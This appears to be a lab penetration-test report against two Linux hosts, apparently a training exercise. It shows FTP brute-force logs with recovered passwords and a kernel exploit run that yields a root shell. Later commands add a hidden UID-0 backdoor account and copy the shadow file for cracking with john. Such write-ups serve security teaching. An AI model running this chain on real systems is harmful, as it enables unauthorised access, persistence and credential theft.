[STATUS] 406.40 tries/min, 6096 tries in 00:15h, 133662 todo in 05:29h
The session file ./hydra.restore was written. Type "hydra -R" to resume session.

bt ~ # hydra -R
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-28 20:38:12
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per task
[DATA] attacking service ftp on port 21
[STATUS] 8410.00 tries/min, 8410 tries in 00:01h, 131348 todo in 00:16h
[STATUS] 3072.00 tries/min, 9216 tries in 00:03h, 130542 todo in 00:43h
[STATUS] 1549.71 tries/min, 10848 tries in 00:07h, 128910 todo in 01:24h
[STATUS] 151.78 tries/min, 12987 tries in 01:25h, 126771 todo in 13:56h
The session file ./hydra.restore was written. Type "hydra -R" to resume session.

bt ~ # hydra -R
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-28 21:12:39
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per task
[DATA] attacking service ftp on port 21
The session file ./hydra.restore was written. Type "hydra -R" to resume session.

bt ~ # hydra -R
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-28 21:12:53
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per task
[DATA] attacking service ftp on port 21
[STATUS] 22420.00 tries/min, 22420 tries in 00:01h, 117338 todo in 00:06h
[STATUS] 7740.67 tries/min, 23222 tries in 00:03h, 116536 todo in 00:16h
[STATUS] 3550.57 tries/min, 24854 tries in 00:07h, 114904 todo in 00:33h
[STATUS] 1873.47 tries/min, 28102 tries in 00:15h, 111656 todo in 00:60h
[STATUS] 1116.58 tries/min, 34614 tries in 00:31h, 105144 todo in 01:35h
[STATUS] 874.72 tries/min, 41112 tries in 00:47h, 98646 todo in 01:53h
[STATUS] 755.90 tries/min, 47622 tries in 01:03h, 92136 todo in 02:02h
[STATUS] 685.14 tries/min, 54126 tries in 01:19h, 85632 todo in 02:05h
[STATUS] 638.21 tries/min, 60630 tries in 01:35h, 79128 todo in 02:04h
[STATUS] 604.82 tries/min, 67135 tries in 01:51h, 72623 todo in 02:01h
[21][ftp] host: 192.168.1.200 login: cptvm1 password: windows
[STATUS] attack finished for 192.168.1.200 (valid pair found)
Hydra (http://www.thc.org) finished at 2009-01-28 23:04:25

bt ~ # hydra -e n -l cptvm2 -P passwords/passwords.txt 192.168.1.200 ftp
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-29 22:54:56
[DATA] 16 tasks, 1 servers, 69879 login tries (l:1/p:69879), ~4367 tries per task
[DATA] attacking service ftp on port 21
[STATUS] 401.00 tries/min, 401 tries in 00:01h, 69478 todo in 02:54h
[STATUS] 401.00 tries/min, 1203 tries in 00:03h, 68676 todo in 02:52h
[STATUS] 403.43 tries/min, 2824 tries in 00:07h, 67055 todo in 02:47h
[STATUS] 405.00 tries/min, 6075 tries in 00:15h, 63804 todo in 02:38h
[STATUS] 405.77 tries/min, 12579 tries in 00:31h, 57300 todo in 02:22h
[STATUS] 406.02 tries/min, 19083 tries in 00:47h, 50796 todo in 02:06h
[STATUS] 406.17 tries/min, 25589 tries in 01:03h, 44290 todo in 01:50h
[STATUS] 406.22 tries/min, 32091 tries in 01:19h, 37788 todo in 01:34h
[STATUS] 406.26 tries/min, 38595 tries in 01:35h, 31284 todo in 01:18h
[STATUS] 406.28 tries/min, 45097 tries in 01:51h, 24782 todo in 01:01h
[21][ftp] host: 192.168.1.200 login: cptvm2 password: linux
[STATUS] attack finished for 192.168.1.200 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2009-01-30 00:47:01

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
TCP services:
  7/tcp       echo
  21/tcp      ftp        vsftpd 1.1.3
  22/tcp      ssh        OpenSSH 3.5p1 (protocol 1.99)
  23/tcp      telnet     Linux telnetd
  79/tcp      finger     Linux fingerd
  80/tcp      http       Apache httpd 2.0.40 (Red Hat Linux)
  109/tcp     POSSIBLY pop2
  110/tcp     pop3       ipopd 2001.78rh
  111/tcp     rpcbind 2 (rpc #100000)
  143/tcp     imap       UW Imapd 2001.315rh
  199/tcp     smux       Linux SNMP multiplexer
  443/tcp     ssl/http   Apache httpd 2.0.40 (Red Hat Linux)
  686/tcp     rquotad 1-2 (rpc #100011)
  993/tcp     imaps
  995/tcp     pop3s
  6000/tcp    X11
  32768/tcp   status 1 (rpc #100024)
  32770/tcp   mountd 1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
  7/udp       echo
  13/udp      daytime
  37/udp      time (32 bits)
  111/udp     rpcbind 2 (rpc #100000)
  123/udp     ntp
  161/udp     snmp       SNMPv1 server (public)
  162/udp     snmptrap
  631/udp     unknown
  683/udp     rquotad 1-2 (rpc #100011)
User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm, gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd, sync, user, uucp, vcsa, webalizer, xfs
Username/password: user/digital, cptvm1/windows, cptvm2/linux

cptvm2 (192.168.1.104)

Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
  22/tcp      ssh        OpenSSH 4.3 (protocol 2.0)
  111/tcp     rpcbind 2 (rpc #100000)
  939/tcp     status 1 (rpc #100024)
User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus, distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Username/password: cptvm1/windows, cptvm2/linux

F. Research of cptvm1 and cptvm2 hosts

i. cptvm1

Various data was gathered pertaining to the permissions of files within the system. Items of interest were files set to run as root (setuid root), files whose permissions allow anyone to write or execute them, and files owned by one of the accounts with a known password.

The location of all files owned by the “cptvm1”, “cptvm2” and “user” accounts (accounts we have passwords for) were gathered. This may provide the ability to access data or executables we normally should not have privileges to.


[cptvm1@cptvm1 ~ ]$ find / -type f -a \( -user cptvm1 -o -user cptvm2 -o -user user \) -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-usercptvm1-o-usercptvm2-ouseruser_200.txt

The locations of all files with write or execute permission set for “other” were gathered (-perm +003 matches either bit; on current GNU find the same test is spelled -perm /003). World-writable files may let us alter data or executables used by other accounts, and world-executable ones may expose tasks we normally should not be able to run.

[cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +003 -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm003_200.txt

The locations of all files that are writable or executable by a group we belong to were gathered (-perm +030 matches either group bit). This may provide the ability to modify data or execute tasks we normally should not have privileges to.

[cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +030 -a \( -group cptvm1 -o -group cptvm2 -o -group user \) -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm030-a-groupcptvm1-ogroupcptvm2-ogroupuser_200.txt

The locations of all files with the setuid bit set were gathered (-perm +4000); those owned by root execute as root regardless of who runs them. This provides the list of executables that should be researched for exploits.

[cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +4000 -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm4000_200.txt

The information gathered during this phase was used mainly for exploit research.

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
TCP services:
  7/tcp       echo
  21/tcp      ftp        vsftpd 1.1.3
  22/tcp      ssh        OpenSSH 3.5p1 (protocol 1.99)
  23/tcp      telnet     Linux telnetd
  79/tcp      finger     Linux fingerd
  80/tcp      http       Apache httpd 2.0.40 (Red Hat Linux)
  109/tcp     POSSIBLY pop2
  110/tcp     pop3       ipopd 2001.78rh
  111/tcp     rpcbind 2 (rpc #100000)
  143/tcp     imap       UW Imapd 2001.315rh
  199/tcp     smux       Linux SNMP multiplexer
  443/tcp     ssl/http   Apache httpd 2.0.40 (Red Hat Linux)
  686/tcp     rquotad 1-2 (rpc #100011)
  993/tcp     imaps
  995/tcp     pop3s
  6000/tcp    X11
  32768/tcp   status 1 (rpc #100024)
  32770/tcp   mountd 1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
  7/udp       echo
  13/udp      daytime
  37/udp      time (32 bits)
  111/udp     rpcbind 2 (rpc #100000)
  123/udp     ntp
  161/udp     snmp       SNMPv1 server (public)
  162/udp     snmptrap
  631/udp     unknown
  683/udp     rquotad 1-2 (rpc #100011)
User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm, gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd, sync, user, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/sbin/suexec, /sbin/pam_timestamp_check, /usr/bin/passwd, /usr/lib/news/bin/inndstart, /usr/lib/news/bin/startinnfeed, /usr/lib/news/bin/rnews, /sbin/pwdb_chkpwd, /sbin/unix_chkpwd, /usr/X11R6/bin/XFree86, /usr/bin/chfn, /usr/bin/chsh, /usr/bin/newgrp, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper, /bin/mount, /bin/ping, /bin/su, /bin/umount, /usr/bin/at, /usr/bin/chage, /usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/rcp, /usr/bin/rlogin, /usr/bin/rsh, /usr/sbin/ping6, /usr/sbin/traceroute, /usr/sbin/traceroute6, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: user/digital, cptvm1/windows, cptvm2/linux

cptvm2 (192.168.1.104)

Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
  22/tcp      ssh        OpenSSH 4.3 (protocol 2.0)
  111/tcp     rpcbind 2 (rpc #100000)
  939/tcp     status 1 (rpc #100024)
User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus, distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Username/password: cptvm1/windows, cptvm2/linux

ii. cptvm2

Various data was gathered pertaining to the kernel version and the permissions of files within the system. Items of interest were files set to run as root (setuid root), files whose permissions allow anyone to write or execute them, and files owned by one of the accounts with a known password.

Up to this point, the specific version of the Linux kernel was not known. To gather this information, the uname command was used.

[cptvm1@localhost ~ ]$ uname -a
Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Thu Mar 15 19:57:35 EDT 2007 i686 i686 i386 GNU/Linux

The locations of all files owned by the “cptvm1” and “cptvm2” accounts (accounts we have passwords for) were gathered. This may provide the ability to access data or executables we normally should not have privileges to.

[cptvm1@localhost ~ ]$ find / -type f -a \( -user cptvm1 -o -user cptvm2 \) -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-usercptvm1-o-usercptvm2_104.txt

The locations of all files with write or execute permission set for “other” were gathered (-perm +003 matches either bit). World-writable files may let us alter data or executables used by other accounts, and world-executable ones may expose tasks we normally should not be able to run.

[cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +003 -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm003_104.txt

The locations of all files that are writable or executable by a group we belong to were gathered (-perm +030 matches either group bit). This may provide the ability to modify data or execute tasks we normally should not have privileges to.

[cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +030 -a \( -group cptvm1 -o -group cptvm2 \) -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm030-a-groupcptvm1-ogroupcptvm2_104.txt

The locations of all files with the setuid bit set were gathered (-perm +4000); those owned by root execute as root regardless of who runs them. This provides the list of executables that should be researched for exploits.

[cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +4000 -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm4000_104.txt

The information gathered during this phase was used mainly for exploit research. However, several files of interest were discovered, notably the CISngtool (Center for Internet Security Next Generation scoring tool, http://www.cisecurity.org).

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
TCP services:
  7/tcp       echo
  21/tcp      ftp        vsftpd 1.1.3
  22/tcp      ssh        OpenSSH 3.5p1 (protocol 1.99)
  23/tcp      telnet     Linux telnetd
  79/tcp      finger     Linux fingerd
  80/tcp      http       Apache httpd 2.0.40 (Red Hat Linux)
  109/tcp     POSSIBLY pop2
  110/tcp     pop3       ipopd 2001.78rh
  111/tcp     rpcbind 2 (rpc #100000)
  143/tcp     imap       UW Imapd 2001.315rh
  199/tcp     smux       Linux SNMP multiplexer
  443/tcp     ssl/http   Apache httpd 2.0.40 (Red Hat Linux)
  686/tcp     rquotad 1-2 (rpc #100011)
  993/tcp     imaps
  995/tcp     pop3s
  6000/tcp    X11
  32768/tcp   status 1 (rpc #100024)
  32770/tcp   mountd 1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
  7/udp       echo
  13/udp      daytime
  37/udp      time (32 bits)
  111/udp     rpcbind 2 (rpc #100000)
  123/udp     ntp
  161/udp     snmp       SNMPv1 server (public)
  162/udp     snmptrap
  631/udp     unknown
  683/udp     rquotad 1-2 (rpc #100011)
User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm, gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd, sync, user, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/sbin/suexec, /sbin/pam_timestamp_check, /usr/bin/passwd, /usr/lib/news/bin/inndstart, /usr/lib/news/bin/startinnfeed, /usr/lib/news/bin/rnews, /sbin/pwdb_chkpwd, /sbin/unix_chkpwd, /usr/X11R6/bin/XFree86, /usr/bin/chfn, /usr/bin/chsh, /usr/bin/newgrp, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper, /bin/mount, /bin/ping, /bin/su, /bin/umount, /usr/bin/at, /usr/bin/chage, /usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/rcp, /usr/bin/rlogin, /usr/bin/rsh, /usr/sbin/ping6, /usr/sbin/traceroute, /usr/sbin/traceroute6, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: user/digital, cptvm1/windows, cptvm2/linux

cptvm2 (192.168.1.104)

Operating system: Linux
Kernel version: Linux 2.6.18-8
TCP ports: 22, 111, 939
TCP services:
  22/tcp      ssh        OpenSSH 4.3 (protocol 2.0)
  111/tcp     rpcbind 2 (rpc #100000)
  939/tcp     status 1 (rpc #100024)
User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus, distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/bin/sudoedit, /media/.hal-mtab-lock, /usr/sbin/suexec, /usr/bin/Xorg, /usr/bin/chfn, /usr/bin/chsh, /usr/sbin/userhelper, /usr/lib/squid/ncsa_auth, /usr/lib/squid/pam_auth, /bin/mount, /bin/ping, /bin/ping6, /bin/su, /bin/umount, /sbin/mount.nfs, /sbin/mount.nfs4, /sbin/pam_timestamp_check, /sbin/umount.nfs, /sbin/umount.nfs4, /sbin/unix_chkpwd, /usr/bin/at, /usr/bin/chage, /usr/bin/gpasswd, /usr/bin/newgrp, /usr/bin/passwd, /usr/bin/rcp, /usr/bin/rlogin, /usr/bin/rsh, /usr/kerberos/bin/ksu, /usr/libexec/openssh/ssh-keysign, /usr/sbin/ccreds_validate, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: cptvm1/windows, cptvm2/linux

G. Penetration of cptvm1

i. Local exploit research via anyside.org

The list of files designated to execute as root was processed to obtain only the base name of each file. This list would be used to search against the anyside.org exploit list.

$ awk '{ print "basename ", $4 }' suid_root_200.txt > basename_200.txt
$ chmod +x basename_200.txt
$ ./basename_200.txt | sort -u > basename-2_200.txt
$ cat basename-2_200.txt
XFree86
at
chage
chfn
chsh
crontab
gpasswd
inndstart
lppasswd
mount
newgrp
pam_timestamp_check
passwd
ping
ping6
pwdb_chkpwd
rcp
rlogin
rnews
rsh
ssh-keysign
startinnfeed
su
sudo
suexec
traceroute
traceroute6
umount
unix_chkpwd
userhelper
userisdnctl
usernetctl

The list of exploits used during the remote exploit search was re-used to search for local exploits on the cptvm1 host.

$ grep exploits\/local exploits_list.txt | grep -w -i -f ../commands/basename-2_200.txt > possible_local_200.txt
$ ll
total 1672
drwxr-xr-x   7 matt  matt     238 Feb 21 14:47 ./
drwxr-xr-x  15 matt  matt     510 Feb 21 14:47 ../
-rw-r--r--   1 matt  matt  126720 Feb  6 14:40 exploits_list.db.tgz
-rw-r--r--   1 matt  matt  702666 Sep 21 05:52 exploits_list.txt
-rw-r--r--   1 matt  matt    1699 Feb 15 20:34 possible_local_200.txt
-rw-r--r--   1 matt  matt    9376 Feb  6 14:43 possible_remote_200.txt

$ cat possible_local_200.txt
2006-07-15;http://www.anyside.org/exp/exploits/local/2006071503.txt;Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit
2006-07-15;http://www.anyside.org/exp/exploits/local/2006071502.txt;Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit
2006-03-01;http://www.anyside.org/exp/exploits/local/2006030101.txt;Apple Mac OS X (/usr/bin/passwd) Custom Passwd Local Root Exploit
2006-01-25;http://www.anyside.org/exp/exploits/local/2006012501.txt;SquirrelMail 3.1 Change Passwd Plugin Local Buffer Overflow Exploit
2005-11-09;http://www.anyside.org/exp/exploits/local/2005110903.txt;FreeBSD (4.x , < 5.4) master.passwd Disclosure Exploit
2005-11-09;http://www.anyside.org/exp/exploits/local/2005110902.txt;Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit
2005-11-08;http://www.anyside.org/exp/exploits/local/2005110801.txt;SuSE Linux <= 9.3, 10 (chfn) Local Root Privilege Escalation Exploit
2005-07-04;http://www.anyside.org/exp/exploits/local/2005070403.txt;Sudo 1.3.1 - 1.6.8p Pathname Validation Local Root Exploit (openbsd)
....;http://www.anyside.org/exp/exploits/local/r57sudo.c;OpenBSD sudo 1.3.1 - 1.6.8p local root exploit
....;http://www.anyside.org/exp/exploits/local/x_hpux_11i_nls_cu.c;The same vulnerability to x_hp-ux11i_nls_ct.c,but exploit ping command to get root shell
2004-9-19;http://www.anyside.org/exp/exploits/local/sudo-exploit.c;sudo exploit.
2004-9-11;http://www.anyside.org/exp/exploits/local/cdrecord-suidshell.sh.txt;cdrecord $RSH exec() SUID Shell Creation
....;http://www.anyside.org/exp/exploits/local/xlock-XLOCALEDIR.c;Local root exploit utilizing the overflow in XLOCALEDIR under XFree86 Version 4.2.x using xlock. Written to work on Redhat 7.2.

The results of the search were 13 possible exploits. The “Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit”, “Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit”, “Apple Mac OS X (/usr/bin/passwd) Custom Passwd Local Root Exploit”, “FreeBSD (4.x , < 5.4) master.passwd Disclosure Exploit”, “SuSE Linux <= 9.3, 10 (chfn) Local Root Privilege Escalation Exploit”, “Sudo 1.3.1 - 1.6.8p Pathname Validation Local Root Exploit (openbsd)”, “OpenBSD sudo 1.3.1 - 1.6.8p local root exploit” and “The same vulnerability to x_hp-ux11i_nls_ct.c,but exploit ping command to get root shell” exploits can be ruled out as they are written for operating systems different than the one we are on. The “SquirrelMail 3.1 Change Passwd Plugin Local Buffer Overflow Exploit” and “cdrecord $RSH exec() SUID Shell Creation” exploits can also be ruled out as they are for applications that don't exist on the host.

This leaves us with 3 possible exploits: “Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit”, “sudo exploit.” and “Local root exploit utilizing the overflow in XLOCALEDIR under XFree86 Version 4.2.x using xlock. Written to work on Redhat 7.2.”.

The version of XFree86 was found to be 4.3.0, which eliminates XFree86 from the list of potential exploits.

[cptvm1@cptvm1 commands]$ X -version

XFree86 Version 4.3.0 (Red Hat Linux release: 4.3.0-2)
Release Date: 27 February 2003
X Protocol Version 11, Revision 0, Release 6.6
Build Operating System: Linux 2.4.20-3bigmem i686 [ELF]
Build Date: 27 February 2003
Build Host: porky.devel.redhat.com

Before reporting problems, check http://www.XFree86.Org/
to make sure that you have the latest version.
Module Loader present
OS Kernel: Linux version 2.4.20-8 ([email protected]) (gcc version 3.2.2 20030222 (Red Hat Linux 3.2.2-5)) #1 Thu Mar 13 17:54:28 EST 2003

The version of sudo was found to be 1.6.6.

[cptvm1@cptvm1 commands]$ sudo -V
Sudo version 1.6.6

The version of sudo fits within the requirements for the “Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit”. So, it was downloaded and the code reviewed. Unfortunately, this exploit relies on an entry within the /etc/sudoers file that points to a file the user has full access to modify. This situation does not exist on the cptvm1 host.

The “sudo exploit” exploit doesn't provide enough information about its requirements to rule it out. Attempting to download the exploit resulted in a 404 error from the anyside.org web site. Without a more detailed description, more research into this exploit was suspended.

ii. Local exploit research via secwatch.org

Searches for exploits of at, chage, chfn, chsh, crontab, lppasswd, mount, newgrp, pam_timestamp_check, passwd, ping, ping6, rcp, rlogin, rnews, rsh, sudo, suexec, traceroute, umount, unix_chkpwd, userhelper and xfree86 returned quite a number of results. Most of the exploits were eliminated due to mismatches on the operating system or version. The remaining exploits, 24 in total, were downloaded, reviewed, compiled and tested. It should be noted that the gcc compiler on the cptvm1 host was named gcc296. To make things easier, a bin directory was created within the “cptvm1” user's home directory, a symbolic link named gcc was created for gcc296 and the bin directory was added to the PATH. No successful exploits for the executables listed above were found.

A search for “inndstart” provided an interesting exploit. Instead of a typical buffer overflow, this exploit abuses a poorly planned application feature. An environment variable named INNCONF can be defined to point to the location of the inn.conf configuration file. This enables a local user with access to the inndstart program to create their own inn.conf file with a "pathrun" component pointing to a directory owned by root and defining a program of their choosing to be executed as root.

While this exploit sounded promising, the ability to change the ownership of a directory/file to root is limited on the cptvm1 host, which ultimately ruled this exploit out.

iii. Privilege escalation using a Kernel VMA exploit

Overall, the secwatch.org site provides a search mechanism that is superior to anyside.org. The secwatch.org search aggregates exploit search results from several other sites into a single result page. Unfortunately, the search mechanism only appears to work optimally with single words. In several cases, a search using multiple words received no results back from secwatch.org. However, when the same search string was entered directly on a site, multiple exploits were found.

With the issues found with the search mechanism of secwatch.org, a switch to milw0rm.com as the primary search site was made. The quality of the exploit code on milw0rm.com appears to be quite a bit better than the code on the other sites that were searched.

A search on milw0rm.com for “linux kernel 2.4” resulted in the following exploits.

Immediately, the “Linux Kernel 2.4.x-2.6.x Assembler Inline Function Local DoS Exploit” exploit can be removed from the list as it isn't a root exploit. The “Linux Kernel 2.4.22 "do_brk()" local Root Exploit (PoC)” exploit can also be removed as the kernel version in use is 2.4.20.

Illustration 1: Milw0rm search results for "linux kernel 2.4".


This left 5 exploits, “Linux Kernel 2.4/2.6 x86-64 System Call Emulation Exploit”, “Linux Kernel 2.4/2.6 bluez Local Root Privilege Escalation Exploit (update)”, “Linux Kernel 2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit”, “Linux Kernel 2.4 uselib() Privilege Elevation Exploit” and “Linux Kernel 2.4.x mremap() bound checking Root Exploit”. The exploits were taken in order, compiled and executed.

The “Linux Kernel 2.4 uselib() Privilege Elevation Exploit” (Tim Hsu, 2005-01-27) resulted in a shell with root access.

[cptvm1@cptvm1 kernel-uselib]$ gcc -o uselib uselib.c
[cptvm1@cptvm1 kernel-uselib]$ ll
total 56
drwxr-xr-x  2 cptvm1 cptvm1  4096 Jan 28 02:10 ./
drwxr-xr-x 42 cptvm1 cptvm1  4096 Feb 14  2009 ../
-rwxrwxr-x  1 cptvm1 cptvm1 27027 Jan 28 02:10 uselib*
-rw-r--r--  1 cptvm1 cptvm1 18774 Feb 14  2009 uselib.c
[cptvm1@cptvm1 kernel-uselib]$ ./uselib
[+] SLAB cleanup child 1 VMAs 32
[+] moved stack bfffd000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xcfc00000 - 0xdf548000
Wait... -
[+] race won maps=58028
expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xd096c000
[+] gate modified ( 0xffec9523 0x0804ec00 )
[+] exploited, uid=0
sh-2.05b# id
uid=0(root) gid=0(root) groups=501(cptvm1)
sh-2.05b#

iv. Maintaining access via creation of a new “r00t” account

After the successful use of the Kernel VMA exploit, consistent root access to the cptvm1 host was required.

The creation of a new user account having the same user id and group id as the real root account was accomplished via the standard Linux useradd utility. After the creation of the account, the password was set to “expl0ited”. While setting the password to a variant of a dictionary word seemed like a good idea, this caused the shadow password cracking phase to take quite a bit longer.

sh-2.05b# env
TERM=vt100
PWD=/home/cptvm1/cpt/exploits/kernel-uselib
SHLVL=1
HISTFILE=/dev/null
_=/bin/env
sh-2.05b# export PATH=/usr/bin:/usr/sbin:/bin:/sbin
sh-2.05b# useradd -u 0 -o -g 0 -d /root r00t
sh-2.05b# passwd r00t
Changing password for user r00t.
New password:
BAD PASSWORD: it is based on a dictionary word
Retype new password:
passwd: all authentication tokens updated successfully.
sh-2.05b#

v. Gathering the shadow password file

With the successful creation of a method to gain root access in the future, the gathering of the shadow password file could be accomplished. In this case, the shadow password file was copied within the shell created by the Kernel VMA exploit. However, it could have also been gathered via the new “r00t” account. While not required, the group shadow file (/etc/gshadow) was also copied.

sh-2.05b# cp /etc/shadow /tmp
sh-2.05b# cp /etc/gshadow /tmp
sh-2.05b# chmod a+rw /tmp/shadow
sh-2.05b# chmod a+rw /tmp/gshadow
sh-2.05b# cd /tmp
sh-2.05b# ls -alF gshadow shadow
-rw-rw-rw- 1 root root  512 Feb 15 02:15 gshadow
-rw-rw-rw- 1 root root 1206 Feb 15 02:15 shadow
sh-2.05b#

H. Cracking passwords of the cptvm1 host

i. Cracking of “user”, “cptvm1” and “cptvm2”

With full access to the shadow password file, the process of cracking the passwords contained within was started.

In this case, the “john” utility was used. Within a few minutes the passwords for the user, cptvm1 and cptvm2 user accounts were cracked (not really required as they had already been brute forced). However, the root and r00t accounts took quite a bit longer to crack. While the john session named “cptvm1” was left to run, research on exploits for the cptvm2 host was started.

bt cptvm1 # john --session=cptvm1 shadow
Loaded 5 password hash (FreeBSD MD5 [32/32])
digital          (user)
windows          (cptvm1)
linux            (cptvm2)
guesses: 3  time: 0:05:24:14 (3)  c/s: 5722  trying: tubt
Session aborted

bt cptvm1 # john -show shadow
user:digital:14019:0:99999:7:::
cptvm1:windows:14019:0:99999:7:::
cptvm2:linux:14019:0:99999:7:::

3 password hashes cracked, 2 left

bt cptvm1 # john --session=cptvm1 --users=root shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])

I. Penetration of cptvm2

i. Privilege escalation using a Kernel vmsplice exploit

Since the cptvm1 host fell to a kernel exploit, time was not spent researching third party applications and system utility exploits on the cptvm2 host. A search on milw0rm.com for “linux kernel 2.6” resulted in the following exploits.

Immediately, the “Linux Kernel 2.6.27.7-generic - 2.6.18 - 2.6.24-1 Local DoS Exploit”, “Linux Kernel 2.6.x sys_timer_create() Local Denial of Service Exploit” and “Linux Kernel 2.6.x Firewall Logging Rules Remote DoS Exploit” exploits can be removed from the list as they aren't root exploits. In addition, the “Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit”, “Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (2)”, “Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3)”, “Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (4)”, “Linux Kernel 2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate)” and “Linux Kernel 2.6.23 - 2.6.24 vmsplice Local Root Exploit” exploits can also be removed from the list as they aren't for the 2.6.18 version of the kernel.

Illustration 2: Milw0rm search results for "linux kernel 2.6".


This left 2 exploits, “Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit” and “Linux Kernel 2.6.x chown() Group Ownership Alteration Exploit”. The exploits were taken in order, compiled and executed.

The “Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit” (qaaz, 2008-02-09) resulted in a shell with root access.

[cptvm1@localhost kernel26_vmsplice]$ ll
total 16
